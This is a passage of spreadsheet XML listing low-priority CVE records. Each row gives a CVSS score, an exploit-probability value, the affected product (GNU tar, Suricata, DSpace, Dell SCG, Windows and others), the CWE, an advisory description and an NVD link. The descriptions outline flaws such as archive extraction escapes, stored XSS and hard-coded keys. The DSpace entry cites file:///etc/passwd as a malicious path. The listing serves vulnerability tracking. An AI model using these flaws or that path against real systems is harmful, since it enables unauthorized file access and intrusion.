      </c>
      <c r="J5547" s="5" t="inlineStr"/>
      <c r="K5547" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L5547"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
        </is>
      </c>
      <c r="M5547" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-0001</t>
        </is>
      </c>
    </row>
    <row r="5548">
      <c r="A5548" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5548" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18073</t>
        </is>
      </c>
      <c r="C5548" s="5" t="n">
        <v>4.4</v>
      </c>
      <c r="D5548" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5548" s="5" t="inlineStr"/>
      <c r="F5548" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G5548" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H5548" s="5" t="inlineStr">
        <is>
          <t>ibm:i</t>
        </is>
      </c>
      <c r="I5548" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J5548" s="5" t="inlineStr"/>
      <c r="K5548" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L5548" s="5" t="inlineStr">
        <is>
          <t>IBM i 7.6, 7.5, 7.4, and 7.3 could allow a local authenticated attacker to inject parameters into a CL command due to improper neutralization of special elements.</t>
        </is>
      </c>
      <c r="M5548" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18073</t>
        </is>
      </c>
    </row>
    <row r="5549">
      <c r="A5549" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5549" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18477</t>
        </is>
      </c>
      <c r="C5549" s="5" t="n">
        <v>4.4</v>
      </c>
      <c r="D5549" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5549" s="5" t="inlineStr"/>
      <c r="F5549" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G5549" s="5" t="inlineStr"/>
      <c r="H5549" s="5" t="inlineStr">
        <is>
          <t>gnu:tar, redhat:enterprise_linux, redhat:openshift_container_platform</t>
        </is>
      </c>
      <c r="I5549" s="5" t="inlineStr">
        <is>
          <t>2026-08-03</t>
        </is>
      </c>
      <c r="J5549" s="5" t="inlineStr"/>
      <c r="K5549" s="5" t="inlineStr">
        <is>
          <t>CWE-367</t>
        </is>
      </c>
      <c r="L5549" s="5" t="inlineStr">
        <is>
          <t>A TOCTOU (Time-of-Check Time-of-Use) vulnerability in GNU tar's incremental dumpdir 'X' rename handling allows a local attacker with write access to a directory being backed up to influence the restore process if the attacker has access to the system where the restore is being performed. During restoration, files or directories may be created, renamed or overwritten outside the intended extraction directory. This could lead to unauthorized file modification or, in some cases, privilege escalation. Exploitation does not require the attacker to modify or craft the archive, and standard backup and restore workflows—including extracting into a newly created directory without using the -P option do not mitigate the issue.</t>
        </is>
      </c>
      <c r="M5549" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18477</t>
        </is>
      </c>
    </row>
    <row r="5550">
      <c r="A5550" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5550" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18508</t>
        </is>
      </c>
      <c r="C5550" s="5" t="n">
        <v>4.4</v>
      </c>
      <c r="D5550" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5550" s="5" t="inlineStr"/>
      <c r="F5550" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G5550" s="5" t="inlineStr"/>
      <c r="H5550" s="5" t="inlineStr">
        <is>
          <t>gnu:tar, redhat:enterprise_linux, redhat:openshift_container_platform</t>
        </is>
      </c>
      <c r="I5550" s="5" t="inlineStr">
        <is>
          <t>2026-08-03</t>
        </is>
      </c>
      <c r="J5550" s="5" t="inlineStr"/>
      <c r="K5550" s="5" t="inlineStr">
        <is>
          <t>CWE-59</t>
        </is>
      </c>
      <c r="L5550" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in GNU tar. When extracting an archive with the --one-top-level option, hardlink targets are not confined to the designated top-level directory and may resolve relative to the extraction working directory. A crafted archive can create hardlinks that escape the intended boundary and, when combined with a preexisting symbolic link under the working directory, may allow writing outside that boundary during a single extraction.</t>
        </is>
      </c>
      <c r="M5550" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18508</t>
        </is>
      </c>
    </row>
    <row r="5551">
      <c r="A5551" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5551" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20513</t>
        </is>
      </c>
      <c r="C5551" s="5" t="n">
        <v>4.4</v>
      </c>
      <c r="D5551" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5551" s="5" t="inlineStr"/>
      <c r="F5551" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5551" s="5" t="inlineStr"/>
      <c r="H5551" s="5" t="inlineStr"/>
      <c r="I5551" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J5551" s="5" t="inlineStr"/>
      <c r="K5551" s="5" t="inlineStr">
        <is>
          <t>CWE-35</t>
        </is>
      </c>
      <c r="L5551" s="5" t="inlineStr">
        <is>
          <t>In Audio HAL, there is a possible information disclosure due to improper input validation. This could lead to local information disclosure if a malicious actor has already obtained the System privilege. User interaction is not needed for exploitation. Patch ID: ALPS11087533; Issue ID: MSV-8245.</t>
        </is>
      </c>
      <c r="M5551" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20513</t>
        </is>
      </c>
    </row>
    <row r="5552">
      <c r="A5552" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5552" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20514</t>
        </is>
      </c>
      <c r="C5552" s="5" t="n">
        <v>4.4</v>
      </c>
      <c r="D5552" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5552" s="5" t="inlineStr"/>
      <c r="F5552" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G5552" s="5" t="inlineStr"/>
      <c r="H5552" s="5" t="inlineStr"/>
      <c r="I5552" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J5552" s="5" t="inlineStr"/>
      <c r="K5552" s="5" t="inlineStr">
        <is>
          <t>CWE-307</t>
        </is>
      </c>
      <c r="L5552" s="5" t="inlineStr">
        <is>
          <t>In Audio HAL, there is a possible information disclosure due to a missing permission check. This could lead to local information disclosure if a malicious actor has already obtained the System privilege. User interaction is not needed for exploitation. Patch ID: ALPS11087632; Issue ID: MSV-8244.</t>
        </is>
      </c>
      <c r="M5552" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20514</t>
        </is>
      </c>
    </row>
    <row r="5553">
      <c r="A5553" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5553" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20518</t>
        </is>
      </c>
      <c r="C5553" s="5" t="n">
        <v>4.4</v>
      </c>
      <c r="D5553" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5553" s="5" t="inlineStr"/>
      <c r="F5553" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G5553" s="5" t="inlineStr"/>
      <c r="H5553" s="5" t="inlineStr"/>
      <c r="I5553" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J5553" s="5" t="inlineStr"/>
      <c r="K5553" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L5553" s="5" t="inlineStr">
        <is>
          <t>In geniezone, there is a possible information disclosure due to a missing bounds check. This could lead to local information disclosure if a malicious actor has already obtained the System privilege. User interaction is needed for exploitation. Patch ID: ALPS10867524 / ALPS10876355; Issue ID: MSV-6674.</t>
        </is>
      </c>
      <c r="M5553" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20518</t>
        </is>
      </c>
    </row>
    <row r="5554">
      <c r="A5554" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5554" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45767</t>
        </is>
      </c>
      <c r="C5554" s="5" t="n">
        <v>4.4</v>
      </c>
      <c r="D5554" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5554" s="5" t="inlineStr"/>
      <c r="F5554" s="5" t="inlineStr"/>
      <c r="G5554" s="5" t="inlineStr"/>
      <c r="H5554" s="5" t="inlineStr"/>
      <c r="I5554" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J5554" s="5" t="inlineStr"/>
      <c r="K5554" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L5554" s="5" t="inlineStr">
        <is>
          <t>Suricata is a network Intrusion Detection System, Intrusion Prevention System and Network Security Monitoring engine. Prior to versions 7.0.16 and 8.0.5, a malicious rule could potentially overwrite any file on the file system on rule load or reload. Versions 7.0.16 and 8.0.5 fix the issue. Some workarounds are available. Preprocess `load`+ `save` rules to disallow absolute filenames for save, use Suricata's privilege dropping to limit writable files, and/or configure landlock in suricata.yaml.</t>
        </is>
      </c>
      <c r="M5554" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45767</t>
        </is>
      </c>
    </row>
    <row r="5555">
      <c r="A5555" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5555" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47234</t>
        </is>
      </c>
      <c r="C5555" s="5" t="n">
        <v>4.4</v>
      </c>
      <c r="D5555" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5555" s="5" t="inlineStr"/>
      <c r="F5555" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G5555" s="5" t="inlineStr"/>
      <c r="H5555" s="5" t="inlineStr"/>
      <c r="I5555" s="5" t="inlineStr">
        <is>
          <t>2026-08-12</t>
        </is>
      </c>
      <c r="J5555" s="5" t="inlineStr"/>
      <c r="K5555" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-532</t>
        </is>
      </c>
      <c r="L5555" s="5" t="inlineStr">
        <is>
          <t>Admidio is an open-source user management solution. Prior to version 5.0.10, when debug logging is enabled, `Session::setCookie()` logs full cookie values and `Session::start()` logs the current session ID. In a real Admidio deployment this includes both the active session cookie and the persistent auto-login cookie. Anyone with access to the log sink can recover live bearer-style credentials from the logs. Version 5.0.10 contains a fix.</t>
        </is>
      </c>
      <c r="M5555" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47234</t>
        </is>
      </c>
    </row>
    <row r="5556">
      <c r="A5556" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5556" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49509</t>
        </is>
      </c>
      <c r="C5556" s="5" t="n">
        <v>4.4</v>
      </c>
      <c r="D5556" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5556" s="5" t="inlineStr"/>
      <c r="F5556" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G5556" s="5" t="inlineStr"/>
      <c r="H5556" s="5" t="inlineStr"/>
      <c r="I5556" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J5556" s="5" t="inlineStr"/>
      <c r="K5556" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L5556" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read vulnerability in Samsung Opensource rLottie allows Overread Buffers.
This issue affects rLottie: 25648aef19187b3f87f4d9420b8d761453ad4630.</t>
        </is>
      </c>
      <c r="M5556" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49509</t>
        </is>
      </c>
    </row>
    <row r="5557">
      <c r="A5557" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5557" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49830</t>
        </is>
      </c>
      <c r="C5557" s="5" t="n">
        <v>4.4</v>
      </c>
      <c r="D5557" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5557" s="5" t="inlineStr"/>
      <c r="F5557" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G5557" s="5" t="inlineStr"/>
      <c r="H5557" s="5" t="inlineStr"/>
      <c r="I5557" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="J5557" s="5" t="inlineStr"/>
      <c r="K5557" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="L5557" s="5" t="inlineStr">
        <is>
          <t>DSpace open source software is a repository application which provides durable access to digital resources. Prior to versions 7.6.7, 8.4, 9.3, and 10.0, when ingesting an aggregated ORE resource by URI (using the OAI-ORE Harvester), the ORE Ingestion Crosswalk does not validate the URI scheme. This may allow for local file inclusion via malicious paths like file:///etc/passwd. The attacker MUST already have DSpace collection administrator privileges in order to perform the attack. This issue has been patched in versions 7.6.7, 8.4, 9.3, and 10.0.</t>
        </is>
      </c>
      <c r="M5557" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49830</t>
        </is>
      </c>
    </row>
    <row r="5558">
      <c r="A5558" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5558" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54179</t>
        </is>
      </c>
      <c r="C5558" s="5" t="n">
        <v>4.4</v>
      </c>
      <c r="D5558" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5558" s="5" t="inlineStr"/>
      <c r="F5558" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5558" s="5" t="inlineStr"/>
      <c r="H5558" s="5" t="inlineStr"/>
      <c r="I5558" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="J5558" s="5" t="inlineStr"/>
      <c r="K5558" s="5" t="inlineStr">
        <is>
          <t>CWE-434, CWE-79</t>
        </is>
      </c>
      <c r="L5558" s="5" t="inlineStr">
        <is>
          <t>backpack/crud provides Create, Read, Update &amp; Delete (CRUD) functions for Backpack, a collection of Laravel packages that help users build custom administration panels. From 6.0.0 until 6.8.14 and 7.0.37, the src/app/Library/Uploaders/SingleBase64Image.php methods SingleBase64Image::uploadFiles and SingleBase64Image::uploadRepeatableFiles, used by image fields through withFiles(), accept any data URI beginning with data:image without validating the declared MIME subtype or decoded bytes, while src/app/Library/Uploaders/Support/FileNameGenerator.php method FileNameGenerator::getExtensionFromFile applies mime_content_type() to the data URI instead of the decoded content. An authenticated administrator can therefore store arbitrary file content under an extensionless filename on the configured disk, which can cause stored cross-site scripting or other unintended behavior when the file is served and accessed. This issue is fixed in version 7.0.38 and 6.8.14.</t>
        </is>
      </c>
      <c r="M5558" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54179</t>
        </is>
      </c>
    </row>
    <row r="5559">
      <c r="A5559" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5559" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61790</t>
        </is>
      </c>
      <c r="C5559" s="5" t="n">
        <v>4.4</v>
      </c>
      <c r="D5559" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5559" s="5" t="inlineStr"/>
      <c r="F5559" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5559" s="5" t="inlineStr"/>
      <c r="H5559" s="5" t="inlineStr"/>
      <c r="I5559" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="J5559" s="5" t="inlineStr"/>
      <c r="K5559" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="L5559" s="5" t="inlineStr">
        <is>
          <t>Weblate is a web-based continuous localization platform used to manage software translations. In versions prior to 2026.7, a team can require its members to configure two-factor authentication before receiving the team's permissions, but this requirement is not enforced for site-wide global permissions. As a result, a user who belongs to a team that enforces 2FA and grants a global permission still receives that global permission even without 2FA configured, while the same requirement is correctly applied to project-, component-, and workspace-scoped permissions. Such a user can act on the granted global permission, including reaching the site management interface at /manage/. This issue is fixed in version 2026.7.</t>
        </is>
      </c>
      <c r="M5559" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61790</t>
        </is>
      </c>
    </row>
    <row r="5560">
      <c r="A5560" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5560" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69713</t>
        </is>
      </c>
      <c r="C5560" s="5" t="n">
        <v>4.4</v>
      </c>
      <c r="D5560" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5560" s="5" t="inlineStr"/>
      <c r="F5560" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5560" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H5560" s="5" t="inlineStr"/>
      <c r="I5560" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J5560" s="5" t="inlineStr"/>
      <c r="K5560" s="5" t="inlineStr"/>
      <c r="L5560" s="5" t="inlineStr">
        <is>
          <t>Dependency on vulnerable third-party component in Windows Secure Boot allows an authorized attacker to bypass a security feature locally.</t>
        </is>
      </c>
      <c r="M5560" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69713</t>
        </is>
      </c>
    </row>
    <row r="5561">
      <c r="A5561" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5561" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72980</t>
        </is>
      </c>
      <c r="C5561" s="5" t="n">
        <v>4.4</v>
      </c>
      <c r="D5561" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5561" s="5" t="inlineStr"/>
      <c r="F5561" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5561" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H5561" s="5" t="inlineStr"/>
      <c r="I5561" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J5561" s="5" t="inlineStr"/>
      <c r="K5561" s="5" t="inlineStr">
        <is>
          <t>CWE-427</t>
        </is>
      </c>
      <c r="L5561" s="5" t="inlineStr">
        <is>
          <t>Uncontrolled search path element in Windows Hello allows an authorized attacker to bypass a security feature locally.</t>
        </is>
      </c>
      <c r="M5561" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72980</t>
        </is>
      </c>
    </row>
    <row r="5562">
      <c r="A5562" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5562" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75059</t>
        </is>
      </c>
      <c r="C5562" s="5" t="n">
        <v>4.4</v>
      </c>
      <c r="D5562" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5562" s="5" t="inlineStr"/>
      <c r="F5562" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G5562" s="5" t="inlineStr"/>
      <c r="H5562" s="5" t="inlineStr">
        <is>
          <t>jetbrains:pycharm</t>
        </is>
      </c>
      <c r="I5562" s="5" t="inlineStr">
        <is>
          <t>2026-08-17</t>
        </is>
      </c>
      <c r="J5562" s="5" t="inlineStr"/>
      <c r="K5562" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L5562" s="5" t="inlineStr">
        <is>
          <t>In JetBrains PyCharm before 2026.2.1 code execution via Quick Documentation was possible</t>
        </is>
      </c>
      <c r="M5562" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75059</t>
        </is>
      </c>
    </row>
    <row r="5563">
      <c r="A5563" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5563" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75526</t>
        </is>
      </c>
      <c r="C5563" s="5" t="n">
        <v>4.4</v>
      </c>
      <c r="D5563" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5563" s="5" t="inlineStr"/>
      <c r="F5563" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5563" s="5" t="inlineStr"/>
      <c r="H5563" s="5" t="inlineStr"/>
      <c r="I5563" s="5" t="inlineStr">
        <is>
          <t>2026-08-20</t>
        </is>
      </c>
      <c r="J5563" s="5" t="inlineStr"/>
      <c r="K5563" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L5563" s="5" t="inlineStr">
        <is>
          <t>django CMS is an easy-to-use and developer-friendly enterprise content management system powered by Django. From 5.0.8 until 5.0.9, ContentRenderer.render_placeholder in cms/plugin_rendering.py can pass stored, attacker-controlled values to ContentRenderer.render_exception when plugin rendering fails in edit mode. Values from get_short_description(), the exception message, the placeholder, or placeholder.source are interpolated into a cms-rendering-exception heading and later returned through mark_safe. Because the heading is not escaped, stored HTML executes in an editor’s browser, and settings.DEBUG does not prevent the custom heading from rendering. The fix uses format_html to escape the message before safe placeholder output is returned. This issue is fixed in versions 5.0.9.</t>
        </is>
      </c>
      <c r="M5563" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75526</t>
        </is>
      </c>
    </row>
    <row r="5564">
      <c r="A5564" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5564" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77643</t>
        </is>
      </c>
      <c r="C5564" s="5" t="n">
        <v>4.4</v>
      </c>
      <c r="D5564" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5564" s="5" t="inlineStr"/>
      <c r="F5564" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5564" s="5" t="inlineStr"/>
      <c r="H5564" s="5" t="inlineStr"/>
      <c r="I5564" s="5" t="inlineStr">
        <is>
          <t>2026-08-20</t>
        </is>
      </c>
      <c r="J5564" s="5" t="inlineStr"/>
      <c r="K5564" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L5564" s="5" t="inlineStr">
        <is>
          <t>A cross-site scripting vulnerability in 
queryparser/termgenerator_internal.cc in Xapian xapian-core before 2.1.0 and before 1.4.32 exists due to incomplete HTML escaping by Xapian::MSet::snippet(). NOTE: this issue exists because of a missed corner case of CVE-2018-0499.</t>
        </is>
      </c>
      <c r="M5564" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77643</t>
        </is>
      </c>
    </row>
    <row r="5565">
      <c r="A5565" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5565" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78486</t>
        </is>
      </c>
      <c r="C5565" s="5" t="n">
        <v>4.4</v>
      </c>
      <c r="D5565" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5565" s="5" t="inlineStr"/>
      <c r="F5565" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5565" s="5" t="inlineStr"/>
      <c r="H5565" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="I5565" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5565" s="5" t="inlineStr"/>
      <c r="K5565" s="5" t="inlineStr">
        <is>
          <t>CWE-321</t>
        </is>
      </c>
      <c r="L5565" s="5" t="inlineStr">
        <is>
          <t>Dell SCG 5.0 Appliance versions prior to 5.36.00.16 and Dell SCG 5.0 Application versions prior to 5.36.00.00, contains an Use of Hard-coded Cryptographic Key vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to unauthorized access.</t>
        </is>
      </c>
      <c r="M5565" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78486</t>
        </is>
      </c>
    </row>
    <row r="5566">
      <c r="A5566" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5566" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79731</t>
        </is>
      </c>
      <c r="C5566" s="5" t="n">
        <v>4.4</v>
      </c>
      <c r="D5566" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5566" s="5" t="inlineStr"/>
      <c r="F5566" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5566" s="5" t="inlineStr"/>
      <c r="H5566" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="I5566" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5566" s="5" t="inlineStr"/>
      <c r="K5566" s="5" t="inlineStr">
        <is>
          <t>CWE-798</t>
        </is>
      </c>
      <c r="L5566"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M5566" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79731</t>
        </is>
      </c>
    </row>
    <row r="5567">
      <c r="A5567" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5567" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79735</t>
        </is>
      </c>
      <c r="C5567" s="5" t="n">
        <v>4.4</v>
      </c>
      <c r="D5567" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5567" s="5" t="inlineStr"/>
      <c r="F5567" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5567" s="5" t="inlineStr"/>
      <c r="H5567" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="I5567" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5567" s="5" t="inlineStr"/>
      <c r="K5567" s="5" t="inlineStr">
        <is>
          <t>CWE-321</t>
        </is>
      </c>
      <c r="L5567" s="5" t="inlineStr">
        <is>
          <t>Dell SCG 5.0 Appliance versions prior to 5.36.00.16 and Dell SCG 5.0 Application versions prior to 5.36.00.00, contains an Use of Hard-coded Cryptographic Key vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to information disclosure.</t>
        </is>
      </c>
      <c r="M5567" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79735</t>
        </is>
      </c>
    </row>
    <row r="5568">
      <c r="A5568" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5568" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80055</t>
        </is>
      </c>
      <c r="C5568" s="5" t="n">
        <v>4.4</v>
      </c>
      <c r="D5568" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5568" s="5" t="inlineStr"/>
      <c r="F5568" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5568" s="5" t="inlineStr"/>
      <c r="H5568" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="I5568" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5568" s="5" t="inlineStr"/>
      <c r="K5568" s="5" t="inlineStr">
        <is>
          <t>CWE-90</t>
        </is>
      </c>
      <c r="L5568" s="5" t="inlineStr">
        <is>
          <t>Dell SCG 5.0 Appliance versions prior to 5.36.00.16 and Dell SCG 5.0 Application versions prior to 5.36.00.00, contains an Improper Neutralization of Special Elements used in an LDAP Query ('LDAP Injection') vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to script injection.</t>
        </is>
      </c>
      <c r="M5568" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80055</t>
        </is>
      </c>
    </row>
    <row r="5569">
      <c r="A5569" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
